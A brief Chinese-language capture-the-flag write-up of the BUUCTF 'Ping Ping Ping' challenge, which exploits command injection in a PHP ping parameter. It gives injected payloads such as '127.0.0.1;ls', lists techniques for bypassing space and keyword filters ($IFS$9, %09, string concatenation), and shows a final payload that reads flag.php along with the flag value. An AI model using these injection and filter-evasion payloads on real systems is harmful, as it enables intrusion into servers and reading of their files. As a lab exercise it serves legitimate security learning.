[PHP知识库]BUUCTF-[GXYCTF2019]Ping Ping Ping

打开链接

/?ip=（GET传参方式）?

这题跟[ACTF2020 新生赛]Exec1差不多

那我们先看看有啥文件

/?ip=;ls或者/?ip=127.0.0.1;ls

（ip地址写啥都行，其中127.0.0.1ping的是本机的地址)

?发现里面有flag.php文件

但是当我去查看flag文件时，发现flag、空格、/、\等符号都被过滤了，当时也在这卡了很久

下面来总结一下常见的绕过方法

1.空格

（1）%20

（2）%09

（3）<>

（4）$IFS$9、 ${IFS}、$IFS

绕过flag字符：采用字符串拼接的方式

例如：a=g;fla$a? -->flag

? ? ? ? ? a=ag;fl$a? -->flag

然后我们就构造playload获取flag

/?ip=127.0.0.1;a=ag;cat$IFS$9fl$a.php

?flag{99babff4-2dc1-4bc4-9962-1a897ef1686c}

?最后如果打开index,php看的话会发现过滤了很多字符